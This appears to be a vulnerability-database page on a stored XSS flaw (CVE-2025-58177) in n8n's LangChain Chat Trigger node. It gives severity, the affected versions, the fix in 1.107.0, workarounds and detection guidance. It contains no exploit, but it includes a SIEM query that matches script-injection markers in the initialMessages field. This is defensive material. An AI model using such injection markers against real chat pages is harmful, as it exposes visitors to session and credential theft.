CVE-2025-58177 – This stored XSS vulnerability in n8n's LangChai... (How to Fix)

Q: What is the severity of CVE-2025-58177?

CVE-2025-58177 has a CVSS score of 5.4 (MEDIUM). This stored XSS vulnerability in n8n's LangChain Chat Trigger node allows authorized users to inject malicious JavaScript into public chat URLs. When users visit these compromised URLs, the payload executes in their browsers, potentially enabling phishing attacks or data theft. Organizations running n8n versions 1.24.0 through 1.106.0 with public chat access enabled are affected.

📋 TL;DR

This stored XSS vulnerability in n8n's LangChain Chat Trigger node allows authorized users to inject malicious JavaScript into public chat URLs. When users visit these compromised URLs, the payload executes in their browsers, potentially enabling phishing attacks or data theft. Organizations running n8n versions 1.24.0 through 1.106.0 with public chat access enabled are affected.

💻 Affected Systems

Products:

n8n workflow automation platform

Versions: 1.24.0 to 1.106.0

Operating Systems: All

Default Config Vulnerable: ✅ No

Notes: Requires both an authorized user to configure malicious payload AND public access enabled on the chat trigger node.

📦 What is this software?

N8n by N8n

View all CVEs affecting N8n →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal session cookies, authentication tokens, or sensitive user data from all visitors to compromised public chat URLs, leading to account takeovers and data breaches.

🟠

Likely Case

Phishing attacks that capture user credentials or redirect users to malicious sites, potentially compromising individual user accounts.

🟢

If Mitigated

Limited to authorized users only, with no public access to chat URLs, reducing attack surface to internal threats only.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Requires authorized user access to configure the vulnerable node and enable public access.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.107.0

Vendor Advisory: https://github.com/n8n-io/n8n/security/advisories/GHSA-mvh4-2cm2-6hpg

Restart Required: No

Instructions:

1. Update n8n to version 1.107.0 or later using your package manager. 2. Verify the update completed successfully. 3. Test chat trigger functionality.

🔧 Temporary Workarounds

Disable LangChain Chat Trigger Node

all

Prevent exploitation by disabling the vulnerable @n8n/n8n-nodes-langchain.chatTrigger node.

🧯 If You Can't Patch

Disable public access to all chat trigger nodes in n8n configuration.
Implement strict Content Security Policy (CSP) headers to mitigate XSS impact.

🔍 How to Verify

Check if Vulnerable:

Check n8n version and verify if running between 1.24.0 and 1.106.0 inclusive.

Check Version:

npx n8n --version

Verify Fix Applied:

Confirm n8n version is 1.107.0 or later and test chat trigger functionality.

📡 Detection & Monitoring

Log Indicators:

Unusual chat trigger configurations with JavaScript payloads in initialMessages field
Multiple failed attempts to access chat trigger nodes

Network Indicators:

Unexpected JavaScript execution in chat responses
Suspicious outbound connections from chat pages

SIEM Query:

source="n8n" AND ("initialMessages" CONTAINS "<script>" OR "initialMessages" CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2025-58177

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.02% exploit probability (4.9th percentile)

Published: September 15, 2025

Last Updated: October 14, 2025

🔗 References

https://github.com/n8n-io/n8n/commit/d4ef191be0b39b65efa68559a3b8d5dad2e102b2 Patch
https://github.com/n8n-io/n8n/pull/18148 Issue Tracking
https://github.com/n8n-io/n8n/security/advisories/GHSA-mvh4-2cm2-6hpg Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-58177, you might also want to check these: